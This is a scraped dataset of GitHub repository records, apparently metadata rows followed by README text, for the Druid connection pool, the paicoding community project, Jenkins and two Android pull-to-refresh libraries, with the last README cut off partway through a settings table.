alibaba/druid,master,27622,8518,2011-11-03T05:12:51Z,83924,2160,阿里云计算平台DataWorks(https://help.aliyun.com/document_detail/137663.html) 团队出品,为监控而生的数据库连接池,,"# druid
[![Java CI](https://img.shields.io/github/actions/workflow/status/alibaba/druid/ci.yaml?branch=master&logo=github&logoColor=white)](https://github.com/alibaba/druid/actions/workflows/ci.yaml)
[![Codecov](https://img.shields.io/codecov/c/github/alibaba/druid/master?logo=codecov&logoColor=white)](https://codecov.io/gh/alibaba/druid/branch/master)
[![Maven Central](https://img.shields.io/maven-central/v/com.alibaba/druid?logo=apache-maven&logoColor=white)](https://search.maven.org/artifact/com.alibaba/druid)
[![Last SNAPSHOT](https://img.shields.io/nexus/snapshots/https/oss.sonatype.org/com.alibaba/druid?label=latest%20snapshot)](https://oss.sonatype.org/content/repositories/snapshots/com/alibaba/druid/)
[![GitHub release](https://img.shields.io/github/release/alibaba/druid)](https://github.com/alibaba/druid/releases)
[![License](https://img.shields.io/github/license/alibaba/druid?color=4D7A97&logo=apache)](https://www.apache.org/licenses/LICENSE-2.0.html)
Introduction
---
- git clone https://github.com/alibaba/druid.git
- cd druid && mvn install
- have fun.
# Related Alibaba Cloud products
* [DataWorks Data Integration](https://help.aliyun.com/document_detail/137663.html) ![DataWorks](https://github.com/alibaba/druid/raw/master/doc/dataworks_datax.png)
Documentation
---
- 中文 https://github.com/alibaba/druid/wiki/%E5%B8%B8%E8%A7%81%E9%97%AE%E9%A2%98
- English https://github.com/alibaba/druid/wiki/FAQ
- Druid Spring Boot Starter https://github.com/alibaba/druid/tree/master/druid-spring-boot-starter
"
itwanger/paicoding,main,1634,324,2022-07-06T12:43:21Z,15426,13,⭐️一款好用又强大的开源社区,基于 Spring Boot、MyBatis-Plus、MySQL、Redis、ElasticSearch、MongoDB、Docker、RabbitMQ 等主流技术栈,附详细教程,包括Java、Spring、MySQL、Redis、微服务&分布式、消息队列等核心知识点。学编程,就上技术派😁。,java mybatis mysql redis spring springboot,"
A community system built on Spring Boot, MyBatis-Plus, MySQL, Redis, ElasticSearch, MongoDB, Docker, RabbitMQ and other mainstream technologies, with a modern internet architecture, a brand-new UI design, and one-click source-code deployment. It covers the complete flow of publishing, searching, commenting on and gathering statistics for articles & tutorials. The code is fully open source with no extra wrapping, making it a modern community project well suited for secondary development and hands-on practice 👍.
## 一、配套服务
1. **技术派网址**:[https://paicoding.com](https://paicoding.com)
2. **技术派教程**:[https://paicoding.com/column](https://paicoding.com/column) 目前已更新高并发手册、JVM 手册、Java 并发编程手册、二哥的 Java 进阶之路,以及技术派部分免费教程。我们的宗旨是:**学编程,就上技术派**😁
3. **技术派管理端源码**:[paicoding-admin](https://github.com/itwanger/paicoding-admin)
4. **技术派专属学习圈子**:[不走弯路,少采坑,附 120 篇技术派全套教程](https://paicoding.com/article/detail/17)
5. **派聪明AI助手**:AI 时代,怎能掉队,欢迎体验 [技术派的派聪明 AI 助手](https://paicoding.com/chat)
6. **码云仓库**:[https://gitee.com/itwanger/paicoding](https://gitee.com/itwanger/paicoding) (国内访问速度更快)
## 二、项目介绍
### 项目演示
#### 前台社区系统
- 项目仓库(GitHub):[https://github.com/itwanger/paicoding](https://github.com/itwanger/paicoding)
- 项目仓库(码云):[https://gitee.com/itwanger/paicoding](https://gitee.com/itwanger/paicoding)
- 项目演示地址:[https://paicoding.com](https://paicoding.com)
![](https://cdn.tobebetterjavaer.com/images/20230602/d7d341c557e7470d9fb41245e5bb4209.png)
#### 后台社区系统
- 项目仓库(GitHub):[https://github.com/itwanger/paicoding-admin](https://github.com/itwanger/paicoding-admin)
- 项目仓库(码云):[https://gitee.com/itwanger/paicoding-admin](https://gitee.com/itwanger/paicoding-admin)
- 项目演示地址:[https://paicoding.com/admin-view](https://paicoding.com/admin/)
![](https://cdn.tobebetterjavaer.com/images/20230602/83139e13a4784c0fbf0adedd8e287c5b.png)
#### 代码展示
![](https://cdn.tobebetterjavaer.com/images/20231205/b8f76cb8e09f4ebca84b3ddd3b61c13e.png)
### 架构图
#### 系统架构图
![](https://cdn.tobebetterjavaer.com/paicoding/3da165adfcad0f03d40e13e941ed4afb.png)
#### 业务架构图
![](https://cdn.tobebetterjavaer.com/paicoding/main/paicoding-business.jpg)
### 组织结构
```
paicoding
├── paicoding-api -- 定义一些通用的枚举、实体类,定义 DO\DTO\VO 等
├── paicoding-core -- 核心工具/组件相关模块,如工具包 util, 通用的组件都放在这个模块(以包路径对模块功能进行拆分,如搜索、缓存、推荐等)
├── paicoding-service -- 服务模块,业务相关的主要逻辑,DB 的操作都在这里
├── paicoding-ui -- HTML 前端资源(包括 JavaScript、CSS、Thymeleaf 等)
├── paicoding-web -- Web模块、HTTP入口、项目启动入口,包括权限身份校验、全局异常处理等
```
#### Environment configuration
All resource configuration lives under the resource path of the `paicoding-web` module; the environment is selected and switched via Maven's env profiles.
Four development environments are currently provided:
- resources-env/dev: local development environment, also the default
- resources-env/test: test environment
- resources-env/pre: pre-release (staging) environment
- resources-env/prod: production environment
Command to switch environments:
```bash
# e.g. switch to the production environment
mvn clean install -DskipTests=true -Pprod
```
#### Configuration files
- resources
- application.yml: main configuration entry point
- application-config.yml: global site information configuration
- logback-spring.xml: logging configuration
- liquibase: database schema managed by Liquibase
- resources-env
- xxx/application-dal.yml: database-related configuration
- xxx/application-image.yml: configuration for image uploads
- xxx/application-web.yml: web-related configuration
#### [前端工程结构说明](docs/前端工程结构说明.md)
### 技术选型
后端技术栈
| 技术 | 说明 | 官网 |
|:-------------------:|----------------------|----------------------------------------------------------------------------------------------------|
| Spring & SpringMVC | Java全栈应用程序框架和WEB容器实现 | [https://spring.io/](https://spring.io/) |
| SpringBoot | Spring应用简化集成开发框架 | [https://spring.io/projects/spring-boot](https://spring.io/projects/spring-boot) |
| mybatis | 数据库orm框架 | [https://mybatis.org](https://mybatis.org) |
| mybatis-plus | 数据库orm框架 | [https://baomidou.com/](https://baomidou.com/) |
| mybatis PageHelper | 数据库翻页插件 | [https://github.com/pagehelper/Mybatis-PageHelper](https://github.com/pagehelper/Mybatis-PageHelper) |
| elasticsearch | 近实时文本搜索 | [https://www.elastic.co/cn/elasticsearch/service](https://www.elastic.co/cn/elasticsearch/service) |
| redis | 内存数据存储 | [https://redis.io](https://redis.io) |
| rabbitmq | 消息队列 | [https://www.rabbitmq.com](https://www.rabbitmq.com) |
| mongodb | NoSql数据库 | [https://www.mongodb.com/](https://www.mongodb.com/) |
| nginx | 服务器 | [https://nginx.org](https://nginx.org) |
| docker | 应用容器引擎 | [https://www.docker.com](https://www.docker.com) |
| hikariCP | 数据库连接 | [https://github.com/brettwooldridge/HikariCP](https://github.com/brettwooldridge/HikariCP) |
| oss | 对象存储 | [https://help.aliyun.com/document_detail/31883.html](https://help.aliyun.com/document_detail/31883.html) |
| https | 证书 | [https://letsencrypt.org/](https://letsencrypt.org/) |
| jwt | jwt登录 | [https://jwt.io](https://jwt.io) |
| lombok | Java语言增强库 | [https://projectlombok.org](https://projectlombok.org) |
| guava | google开源的java工具集 | [https://github.com/google/guava](https://github.com/google/guava) |
| thymeleaf | html5模板引擎 | [https://www.thymeleaf.org](https://www.thymeleaf.org) |
| swagger | API文档生成工具 | [https://swagger.io](https://swagger.io) |
| hibernate-validator | 验证框架 | [hibernate.org/validator/](hibernate.org/validator/) |
| quick-media | 多媒体处理 | [https://github.com/liuyueyi/quick-media](https://github.com/liuyueyi/quick-media) |
| liquibase | 数据库版本管理 | [https://www.liquibase.com](https://www.liquibase.com) |
| jackson | json/xml处理 | [https://www.jackson.com](https://www.jackson.com) |
| ip2region | ip地址 | [https://github.com/zoujingli/ip2region](https://github.com/zoujingli/ip2region) |
| websocket | 长连接 | [https://docs.spring.io/spring/reference/web/websocket.html](https://docs.spring.io/spring/reference/web/websocket.html) |
| sensitive-word | 敏感词 | [https://github.com/houbb/sensitive-word](https://github.com/houbb/sensitive-word) |
| chatgpt | chatgpt | [https://openai.com/blog/chatgpt](https://openai.com/blog/chatgpt) |
| 讯飞星火 | 讯飞星火大模型 | [https://www.xfyun.cn/doc/spark/Web.html](https://www.xfyun.cn/doc/spark/Web.html#_1-%E6%8E%A5%E5%8F%A3%E8%AF%B4%E6%98%8E) |
## 三、技术派教程
技术派教程共 120+ 篇,从中整理出 20 篇,供大家免费学习。
- [(🌟 新人必看)技术派系统架构&功能模块一览](https://paicoding.com/article/detail/15)
- [(🌟 新人必看)小白如何学习技术派](https://paicoding.com/article/detail/366)
- [(🌟 新人必看)如何将技术派写入简历](https://paicoding.com/article/detail/373)
- [(🌟 新人必看)技术派架构方案设计](https://paicoding.com/column/6/5)
- [(🌟 新人必看)技术派技术方案设计](https://paicoding.com/article/detail/208)
- [(🌟 新人必看)技术派项目管理流程](https://paicoding.com/article/detail/445)
- [(🌟 新人必看)技术派MVC分层架构](https://paicoding.com/article/detail/446)
- [(🌟 新人必看)技术派项目工程搭建手册](https://paicoding.com/article/detail/459)
- [(👍 强烈推荐)技术派微信公众号自动登录](https://paicoding.com/article/detail/448)
- [(👍 强烈推荐)技术派微信扫码登录实现](https://paicoding.com/article/detail/453)
- [(👍 强烈推荐)技术派Session/Cookie身份验证识别](https://paicoding.com/article/detail/449)
- [(👍 强烈推荐)技术派Mysql/Redis缓存一致性](https://paicoding.com/column/6/3)
- [(👍 强烈推荐)技术派Redis实现用户活跃排行榜](https://paicoding.com/article/detail/454)
- [(👍 强烈推荐)技术派消息队列RabbitMQ](https://paicoding.com/column/6/2)
- [(👍 强烈推荐)技术派消息队列RabbitMQ连接池](https://paicoding.com/column/6/1)
- [(👍 强烈推荐)技术派消息队列Kafka](https://paicoding.com/article/detail/460)
- [(👍 强烈推荐)技术派Cancal实现MySQL和ES同步](https://paicoding.com/column/6/8)
- [(👍 强烈推荐)技术派ES实现查询](https://paicoding.com/article/detail/341)
- [(👍 强烈推荐)技术派定时任务实现](https://paicoding.com/article/detail/457)
- [(👍 扬帆起航)送给坚持到最后的自己,一起杨帆起航](https://paicoding.com/article/detail/447)
## 四、环境搭建
### 开发工具
| 工具 | 说明 | 官网 |
|:----------------:|--------------|--------------------------------------------------------------------------------------------------------------|
| IDEA | java开发工具 | [https://www.jetbrains.com](https://www.jetbrains.com) |
| Webstorm | web开发工具 | [https://www.jetbrains.com/webstorm](https://www.jetbrains.com/webstorm) |
| Chrome | 浏览器 | [https://www.google.com/intl/zh-CN/chrome](https://www.google.com/intl/zh-CN/chrome) |
| ScreenToGif | gif录屏 | [https://www.screentogif.com](https://www.screentogif.com) |
| SniPaste | 截图 | [https://www.snipaste.com](https://www.snipaste.com) |
| PicPick | 图片处理工具 | [https://picpick.app](https://picpick.app) |
| MarkText | markdown编辑器 | [https://github.com/marktext/marktext](https://github.com/marktext/marktext) |
| curl | http终端请求 | [https://curl.se](https://curl.se) |
| Postman | API接口调试 | [https://www.postman.com](https://www.postman.com) |
| draw.io | 流程图、架构图绘制 | [https://www.diagrams.net/](https://www.diagrams.net/) |
| Axure | 原型图设计工具 | [https://www.axure.com](https://www.axure.com) |
| navicat | 数据库连接工具 | [https://www.navicat.com](https://www.navicat.com) |
| DBeaver | 免费开源的数据库连接工具 | [https://dbeaver.io](https://dbeaver.io) |
| iTerm2 | mac终端 | [https://iterm2.com](https://iterm2.com) |
| windows terminal | win终端 | [https://learn.microsoft.com/en-us/windows/terminal/install](https://learn.microsoft.com/en-us/windows/terminal/install) |
| SwitchHosts | host管理 | [https://github.com/oldj/SwitchHosts/releases](https://github.com/oldj/SwitchHosts/releases) |
### 开发环境
| 工具 | 版本 | 下载 |
|:-------------:|:----------|------------------------------------------------------------------------------------------------------------------------|
| jdk | 1.8+ | [https://www.oracle.com/java/technologies/downloads/#java8](https://www.oracle.com/java/technologies/downloads/#java8) |
| maven | 3.4+ | [https://maven.apache.org/](https://maven.apache.org/) |
| mysql | 5.7+/8.0+ | [https://www.mysql.com/downloads/](https://www.mysql.com/downloads/) |
| redis | 5.0+ | [https://redis.io/download/](https://redis.io/download/) |
| elasticsearch | 8.0.0+ | [https://www.elastic.co/cn/downloads/elasticsearch](https://www.elastic.co/cn/downloads/elasticsearch) |
| nginx | 1.10+ | [https://nginx.org/en/download.html](https://nginx.org/en/download.html) |
| rabbitmq | 3.10.14+ | [https://www.rabbitmq.com/news.html](https://www.rabbitmq.com/news.html) |
| ali-oss | 3.15.1 | [https://help.aliyun.com/document_detail/31946.html](https://help.aliyun.com/document_detail/31946.html) |
| git | 2.34.1 | [http://github.com/](http://github.com/) |
| docker | 4.10.0+ | [https://docs.docker.com/desktop/](https://docs.docker.com/desktop/) |
| let's encrypt | https证书 | [https://letsencrypt.org/](https://letsencrypt.org/) |
### 搭建步骤
#### 本地部署教程
> [本地开发环境手把手教程](docs/本地开发环境配置教程.md)
### 云服务器部署教程
> [环境搭建 & 基于源码的部署教程](docs/安装环境.md)
> [服务器启动教程](docs/服务器启动教程.md)
## 五、友情链接
- [toBeBetterjavaer](https://github.com/itwanger/toBeBetterJavaer) :一份通俗易懂、风趣幽默的Java学习指南,内容涵盖Java基础、Java并发编程、Java虚拟机、Java企业级开发、Java面试等核心知识点。学Java,就认准二哥的Java进阶之路😄
- [paicoding-admin](https://github.com/itwanger/paicoding-admin) :🚀🚀🚀 paicoding-admin,技术派管理端,基于 React18、React-Router v6、React-Hooks、Redux、TypeScript、Vite3、Ant-Design 5.x、Hook Admin、ECharts 的一套社区管理系统,够惊艳哦。
## 六、鸣谢
技术派收到了 [Jetbrains](https://jb.gg/OpenSourceSupport) 多份 Licenses(详情戳 [这里](https://paicoding.com/article/detail/331) ),并已分配给项目 [活跃开发者](https://github.com/itwanger/paicoding/graphs/contributors) ,非常感谢 Jetbrains 对开源社区的支持。
![JetBrains Logo (Main) logo](https://resources.jetbrains.com/storage/products/company/brand/logos/jb_beam.svg)
## 七、star 趋势图
[![Star History Chart](https://api.star-history.com/svg?repos=itwanger/paicoding&type=Date)](https://star-history.com/#itwanger/paicoding&Date)
## 八、公众号
GitHub 上标星 10000+ 的开源知识库《 [二哥的 Java 进阶之路](https://github.com/itwanger/toBeBetterJavaer) 》第一版 PDF 终于来了!包括Java基础语法、数组&字符串、OOP、集合框架、Java IO、异常处理、Java 新特性、网络编程、NIO、并发编程、JVM等等,共计 32 万余字,可以说是通俗易懂、风趣幽默……详情戳:[太赞了,GitHub 上标星 8700+ 的 Java 教程](https://javabetter.cn/overview/)
微信搜 **沉默王二** 或扫描下方二维码关注二哥的原创公众号,回复 **222** 即可免费领取。
![](https://cdn.tobebetterjavaer.com/tobebetterjavaer/images/gongzhonghao.png)
## 九、许可证
[Apache License 2.0](https://github.com/itwanger/paicoding/edit/main/README.md)
Copyright (c) 2022-2023 技术派(楼仔、沉默王二、一灰、小超)
"
jenkinsci/jenkins,master,22361,8513,2010-11-22T21:21:23Z,157677,73,Jenkins automation server,cicd continuous-delivery continuous-deployment continuous-integration devops groovy hacktoberfest java jenkins pipelines-as-code,"
# About
[![Jenkins Regular Release](https://img.shields.io/endpoint?url=https%3A%2F%2Fwww.jenkins.io%2Fchangelog%2Fbadge.json)](https://www.jenkins.io/changelog)
[![Jenkins LTS Release](https://img.shields.io/endpoint?url=https%3A%2F%2Fwww.jenkins.io%2Fchangelog-stable%2Fbadge.json)](https://www.jenkins.io/changelog-stable)
[![Docker Pulls](https://img.shields.io/docker/pulls/jenkins/jenkins.svg)](https://hub.docker.com/r/jenkins/jenkins/)
[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/3538/badge)](https://bestpractices.coreinfrastructure.org/projects/3538)
[![Gitter](https://img.shields.io/gitter/room/jenkinsci/jenkins)](https://app.gitter.im/#/room/#jenkinsci_jenkins:gitter.im)
In a nutshell, Jenkins is the leading open-source automation server.
Built with Java, it provides over 1,800 [plugins](https://plugins.jenkins.io/) to support automating virtually anything,
so that humans can spend their time doing things machines cannot.
# What to Use Jenkins for and When to Use It
Use Jenkins to automate your development workflow, so you can focus on work that matters most. Jenkins is commonly used for:
- Building projects
- Running tests to detect bugs and other issues as soon as they are introduced
- Static code analysis
- Deployment
Execute repetitive tasks, save time, and optimize your development process with Jenkins.
# Downloads
The Jenkins project provides official distributions as WAR files, Docker images, native packages and installers for platforms including several Linux distributions and Windows.
See the [Downloads](https://www.jenkins.io/download) page for references.
For all distributions Jenkins offers two release lines:
- [Weekly](https://www.jenkins.io/download/weekly/) -
Frequent releases which include all new features, improvements, and bug fixes.
- [Long-Term Support (LTS)](https://www.jenkins.io/download/lts/) -
Older release line which gets periodically updated via bug fix backports.
Latest releases:
[![Jenkins Regular Release](https://img.shields.io/endpoint?url=https%3A%2F%2Fwww.jenkins.io%2Fchangelog%2Fbadge.json)](https://www.jenkins.io/changelog)
[![Jenkins LTS Release](https://img.shields.io/endpoint?url=https%3A%2F%2Fwww.jenkins.io%2Fchangelog-stable%2Fbadge.json)](https://www.jenkins.io/changelog-stable)
# Source
Our latest and greatest source of Jenkins can be found on [GitHub](https://github.com/jenkinsci/jenkins). Fork us!
# Contributing to Jenkins
Follow the [contributing guidelines](CONTRIBUTING.md) if you want to propose a change in the Jenkins core.
For more information about participating in the community and contributing to the Jenkins project,
see [this page](https://www.jenkins.io/participate/).
Documentation for Jenkins core maintainers is in the [maintainers guidelines](docs/MAINTAINERS.adoc).
# News and Website
All information about Jenkins can be found on our [website](https://www.jenkins.io/).
Follow us on [Twitter](https://twitter.com/jenkinsci) or [LinkedIn](https://www.linkedin.com/company/jenkins-project/).
# Governance
See the [Jenkins Governance Document](https://www.jenkins.io/project/governance/) for information about the project's open governance, our philosophy and values, and development practices.
Jenkins Code of Conduct can be found [here](https://www.jenkins.io/project/conduct/).
# Adopters
Jenkins is used by millions of users and thousands of companies.
See [adopters](https://www.jenkins.io/project/adopters/) for the list of Jenkins adopters and their success stories.
# License
Jenkins is **licensed** under the **[MIT License](LICENSE.txt)**.
"
tuesda/CircleRefreshLayout,master,1782,369,2015-07-20T18:19:49Z,4357,22,a custom pull-to-refresh layout which contains an interesting animation,,"This is a project with a custom pull-to-refresh layout which contains an interesting animation. The animation is inspired by a design made by Ramotion.
### Demo ###
![](gif/circlerefresh.gif)
### Usage ###
``` xml
```
Call back when refresh starts and complete:
``` java
mRefreshLayout.setOnRefreshListener(
new CircleRefreshLayout.OnCircleRefreshListener() {
@Override
public void refreshing() {
// do something when refresh starts
}
@Override
public void completeRefresh() {
// do something when refresh complete
}
});
```
When refreshing is done (for example, when image loading completes), you can invoke:
``` java
mRefreshLayout.finishRefreshing();
```
### License ###
MIT
"
dkzwm/SmoothRefreshLayout,master,1300,221,2017-05-31T09:27:16Z,194389,3,一款支持上下拉刷新、越界回弹、二级刷新、横向刷新、拉伸回弹、平滑滚动、嵌套滚动的多功能刷新控件,horizontal loadmore nested nestedscroll nestedscrollingchild3 nestedscrollingparent3 overscroll overscroll-decor refresh refreshlayout scale smoothscroll two-level,"# SmoothRefreshLayout
![Methods](https://img.shields.io/badge/Methods%20%7C%20Size-740%20%7C%2084%20KB-e91e63.svg)
[![MinSdk](https://img.shields.io/badge/MinSdk-14-blue.svg)](https://developer.android.com/about/versions/android-4.0.html)
[![License](https://img.shields.io/badge/License-MIT-blue.svg)](https://github.com/dkzwm/SmoothRefreshLayout/blob/master/LICENSE)
## [English](README_EN.md) | 中文
An efficient Android refresh library that in principle supports every view; it is more powerful than the official SwipeRefreshLayout and easy to use.
## Features:
- In principle supports every view, and can be adapted efficiently to specific needs.
- Supports multi-touch.
- Supports nested scrolling, fully implementing the NestedScrollingChild3 and NestedScrollingParent3 interfaces, so it plays well with CoordinatorLayout.
- Extends ViewGroup directly for excellent performance and supports FrameLayout-like features (Gravity, Margin).
- Supports automatic refresh, automatic pull-up loading, and auto load-more on reaching the bottom (not recommended; implementing it in the Adapter is advised, and the bottom-detection callback can be customized to achieve pre-loading).
- Supports over-scroll rebound, including a physics-based rebound effect.
- Supports custom refresh view styles: STYLE_DEFAULT (does not change size), STYLE_SCALE (dynamically resizes; measured and laid out inside SRL, so there is a performance cost), STYLE_PIN (does not resize, pinned to the top or bottom), STYLE_FOLLOW_SCALE (first follows the movement vertically without resizing, then resizes dynamically once the offset exceeds the view height, with a performance cost), STYLE_FOLLOW_PIN (does not resize, first follows the movement, then stays fixed once the offset exceeds the view height), STYLE_FOLLOW_CENTER (does not resize, first follows the movement, then keeps the view at the midpoint of the moved distance once the offset exceeds the view height).
- Supports two-level refresh events (TwoLevelSmoothRefreshLayout), e.g. Taobao's second floor and JD promotions.
- Supports horizontal refresh (HorizontalSmoothRefreshLayout).
- Supports smooth, synchronized scrolling for load-more in ListView, GridView and RecyclerView.
- Gesture support: synchronized fling (while the refresh view is still visible, it first rolls back to hide the refresh view and then passes the fling gesture down).
- Can be used as a stretchable wrapper layout for inner views (similar to the Xiaomi settings page effect).
- Rich callback interfaces and debug information; rich effects can be built on the existing API.
## 引入
添加如下依赖到你的 build.gradle 文件:
```
dependencies {
implementation 'com.github.dkzwm:srl-core:1.7.2.4'
implementation 'com.github.dkzwm:srl-ext-classics:1.7.2.4'
implementation 'com.github.dkzwm:srl-ext-material:1.7.2.4'
implementation 'com.github.dkzwm:srl-ext-dynamic-rebound:1.7.2.4'
implementation 'com.github.dkzwm:srl-ext-horizontal:1.7.2.4'
implementation 'com.github.dkzwm:srl-ext-two-level:1.7.2.4'
implementation 'com.github.dkzwm:srl-ext-util:1.7.2.4'
}
```
## 演示程序
下载 [Demo.apk](https://raw.githubusercontent.com/dkzwm/SmoothRefreshLayout/master/apk/demo.apk)
## 更新日志
#### 老版本升级务必查看
[更新日志](ext/UPDATE.md)
## 快照
![嵌套滑动](snapshot/test_nested_scroll.gif)
![二级刷新](snapshot/test_two_level_refresh.gif)
----
![横向刷新](snapshot/test_horizontal_refresh.gif)
![拉伸收缩效果](snapshot/test_scale_effect.gif)
----
![QQ红包活动](snapshot/test_qq_style.gif)
![浏览器内核下拉展示](snapshot/test_qq_web_browser_style.gif)
## 使用
#### 在Xml中配置
```
```
#### Java代码配置
```
SmoothRefreshLayout refreshLayout = (SmoothRefreshLayout)findViewById(R.id.smoothRefreshLayout);
refreshLayout.setHeaderView(new ClassicHeader(this));
refreshLayout.setOnRefreshListener(new RefreshingListenerAdapter() {
@Override
public void onRefreshing() {
mHandler.postDelayed(new Runnable() {
@Override
public void run() {
refreshLayout.refreshComplete();
}
}, 4000);
}
});
```
#### 自定义刷新视图
##### 接口定义
```
public interface IRefreshView {
byte TYPE_HEADER = 0;
byte TYPE_FOOTER = 1;
byte STYLE_DEFAULT = 0;
byte STYLE_SCALE = 1;
byte STYLE_PIN = 2;
byte STYLE_FOLLOW_SCALE = 3;
byte STYLE_FOLLOW_PIN = 4;
byte STYLE_FOLLOW_CENTER = 5;
/**
* 返回是头部视图还是尾部视图;
*/
int getType();
/**
* 一般情况都是View实现本接口,所以返回this;
*/
View getView();
/**
* 获取视图样式,自1.4.8版本后支持6种样式,STYLE_DEFAULT、STYLE_SCALE、STYLE_PIN、STYLE_FOLLOW_SCALE、STYLE_FOLLOW_PIN、STYLE_FOLLOW_CENTER;
*/
int getStyle();
/**
* 获取视图的自定义高度,当视图样式为STYLE_SCALE和STYLE_FOLLOW_SCALE时,必须返回一个确切且大于0的值,使用横向刷新库时,该属性实际应该返回的是视图的宽度;
* 自1.6.1版本开始,如果想要当前视图铺满布局即MATCH_PARENT,那么支持返回ViewGroup.LayoutParams.MATCH_PARENT对应的值即`-1`;
*/
int getCustomHeight();
/**
* 手指离开屏幕;
*/
void onFingerUp(SmoothRefreshLayout layout, T indicator);
/**
* 重置视图;
*/
void onReset(SmoothRefreshLayout layout);
/**
* 重新配置视图,准备刷新;
*/
void onRefreshPrepare(SmoothRefreshLayout layout);
/**
* 开始刷新;
*/
void onRefreshBegin(SmoothRefreshLayout layout, T indicator);
/**
* 刷新完成;
*/
void onRefreshComplete(SmoothRefreshLayout layout,boolean isSuccessful);
/**
* 当头部或者尾部视图发生位置变化;
*/
void onRefreshPositionChanged(SmoothRefreshLayout layout, byte status, T indicator);
/**
* 当头部或者尾部视图仍然处于处理事务中,这时候移动其他刷新视图则会调用该方法;
* 在1.4.6版本新加入;
*/
void onPureScrollPositionChanged(SmoothRefreshLayout layout, byte status, T indicator);
}
```
##### 添加自定义刷新视图
- 全局静态代码构造
```
SmoothRefreshLayout.setDefaultCreator(new IRefreshViewCreator() {
@Override
public IRefreshView createHeader(SmoothRefreshLayout layout) {
ClassicHeader header = new ClassicHeader(layout.getContext());
return header;
}
@Override
public IRefreshView createFooter(SmoothRefreshLayout layout) {
ClassicFooter footer = new ClassicFooter(layout.getContext());
return footer;
}
});
```
- 动态代码添加
```
ClassicHeader header = new ClassicHeader(mRefreshLayout.getContext());
mRefreshLayout.setHeaderView(header);
ClassicFooter footer = new ClassicFooter(mRefreshLayout.getContext());
mRefreshLayout.setFooterView(footer);
```
- 请直接写入Xml文件,SmoothRefreshLayout会根据添加的View是否是实现了IRefreshView接口进行判断
#### Implementing a QQ-like pull damping effect
```
mRefreshLayout.setIndicatorOffsetCalculator(new IIndicator.IOffsetCalculator() {
    @Override
    public float calculate(@IIndicator.MovingStatus int status, int currentPos, float offset) {
        if (status == IIndicator.MOVING_HEADER) {
            if (offset < 0) {
                // To mimic QQ, where damping applies only while pulling down and not while
                // dragging back, return the raw offset here;
                // if you want damping while dragging back as well, remove this if-block
                return offset;
            }
            return (float) Math.pow(Math.pow(currentPos / 2, 1.28d) + offset, 1 / 1.28d) * 2 - currentPos;
        } else if (status == IIndicator.MOVING_FOOTER) {
            if (offset > 0) {
                // To mimic QQ, where damping applies only while pulling up and not while
                // dragging back, return the raw offset here;
                // if you want damping while dragging back as well, remove this if-block
                return offset;
            }
            return -((float) Math.pow(Math.pow(currentPos / 2, 1.28d) - offset, 1 / 1.28d) * 2 - currentPos);
        } else {
            if (offset > 0) {
                return (float) Math.pow(offset, 1 / 1.28d) * 2;
            } else if (offset < 0) {
                return -(float) Math.pow(-offset, 1 / 1.28d) * 2;
            } else {
                return offset;
            }
        }
    }
});
```
#### XML attributes
##### SmoothRefreshLayout configuration
|Name|Type|Description|
|:---:|:---:|:---:|
|sr_content|reference|Resource ID of the content view|
|sr_resistance|float|Drag resistance while moving the refresh views (default: `1.65f`)|
|sr_resistanceOfFooter|float|Drag resistance while moving the Footer view (default: `1.65f`)|
|sr_resistanceOfHeader|float|Drag resistance while moving the Header view (default: `1.65f`)|
|sr_ratioToRefresh|float|Refresh trigger position as a ratio of the refresh view height (default: `1f`)|
|sr_ratioOfHeaderToRefresh|float|Refresh trigger position as a ratio of the Header view height (default: `1f`)|
|sr_ratioOfFooterToRefresh|float|Load-more trigger position as a ratio of the Footer view height (default: `1f`)|
|sr_ratioToKeep|float|Position kept while refreshing, as a ratio of the refresh view height (default: `1f`); only takes effect when the value is less than or equal to the trigger ratio|
|sr_ratioToKeepHeader|float|Position kept while refreshing, as a ratio of the Header view height (default: `1f`); only takes effect when the value is less than or equal to the trigger ratio|
|sr_ratioToKeepFooter|float|Position kept while refreshing, as a ratio of the Footer view height (default: `1f`); only takes effect when the value is less than or equal to the trigger ratio|
|sr_maxMoveRatio|float|Maximum movement as a ratio of the refresh view height (default: `0f`, meaning no limit is applied)|
|sr_maxMoveRatioOfHeader|float|Maximum movement as a ratio of the Header view height (default: `0f`, meaning no limit is applied)|
|sr_maxMoveRatioOfFooter|float|Maximum movement as a ratio of the Footer view height (default: `0f`, meaning no limit is applied)|
|sr_closeDuration|integer|Duration for collapsing the refresh views back to the start position (default: `350`)|
|sr_closeHeaderDuration|integer|Duration for collapsing the Header view back to the start position (default: `350`)|
|sr_closeFooterDuration|integer|Duration for collapsing the Footer view back to the start position (default: `350`)|
|sr_backToKeepDuration|integer|Duration for rolling back to the kept refresh-view position (default: `200`)|
|sr_backToKeepHeaderDuration|integer|Duration for rolling back to the kept Header position (default: `200`)|
|sr_backToKeepFooterDuration|integer|Duration for rolling back to the kept Footer position (default: `200`)|
|sr_enablePinContent|boolean|Pin the content view (default: `false`)|
|sr_enableKeep|boolean|Keep the refresh view at its configured keep position while refreshing (default: `true`)|
|sr_enablePullToRefresh|boolean|Pull-to-refresh: trigger the refresh as soon as the trigger position is reached while pulling (default: `false`)|
|sr_enableOverScroll|boolean|Over-scroll bounce (default: `true`)|
|sr_enableRefresh|boolean|Enable pull-down refresh (default: `true`)|
|sr_enableLoadMore|boolean|Enable load-more (default: `false`)|
|sr_mode|enum|Mode (default: `MODE_DEFAULT`, the refresh-widget mode)|
|sr_stickyHeader|reference|Resource ID of the sticky header|
|sr_stickyFooter|reference|Resource ID of the sticky footer|
##### TwoLevelSmoothRefreshLayout configuration
|Name|Type|Description|
|:---:|:---:|:---:|
|sr_enableTwoLevelRefresh|boolean|Enable two-level refresh (default: `true`)|
|sr_backToKeep2Duration|integer|Duration for rolling back to the position where the two-level Header is kept during a two-level refresh (default: `500`)|
|sr_closeHeader2Duration|integer|Duration for closing the two-level refresh Header (default: `500`)|
##### Configuration for other Views wrapped inside SmoothRefreshLayout
|Name|Type|Description|
|:---:|:---:|:---:|
|layout_gravity|flag|Gravity of other wrapped views (i.e. neither the target view nor a refresh view)|
#### SmoothRefreshLayout Java setters
|Name|Parameters|Description|
|:---:|:---:|:---:|
|setHeaderView|IRefreshView|Set the Header view|
|setFooterView|IRefreshView|Set the Footer view|
|setContentView|View|Set the content view|
|setMode|int|Set the current mode|
|setLayoutManager|LayoutManager|Set a custom layout manager|
|setDisableWhenAnotherDirectionMove|boolean|Set this to `true` when the inner view contains views that scroll in the other direction (default: `false`)|
|setMaxOverScrollDuration|int|Maximum duration of the over-scroll bounce animation (default: `350`)|
|setMinOverScrollDuration|int|Minimum duration of the over-scroll bounce animation (default: `100`)|
